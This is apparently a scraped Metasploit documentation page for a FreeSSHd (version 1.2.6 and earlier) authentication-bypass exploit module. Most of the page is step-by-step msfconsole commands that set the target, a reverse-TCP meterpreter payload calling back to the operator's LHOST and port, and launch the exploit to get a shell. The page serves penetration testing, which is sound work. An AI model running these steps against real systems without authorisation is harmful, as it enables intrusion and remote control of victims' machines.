Path: blob/master/documentation/modules/exploit/windows/ssh/freesshd_authbypass.md
24396 views
Description
This module exploits a vulnerability found in FreeSSHd <= 1.2.6 to bypass authentication. You just need the username (which defaults to root). The exploit has been tested with both password and public key authentication.
Verification
Start msfconsole
Do :
use exploit/windows/ssh/freesshd_authbypassDo :
set RHOST [target IP]Do :
set PAYLOAD [valid windows payload]if you want to use other payloads (windows/meterpreter/reverse_tcpby default)Do :
set LHOST [Your IP]Do :
set LPORT [valid port](port is4444by default)Do :
exploitIf target is vulnerable, a shell (
meterpreterby default) should pop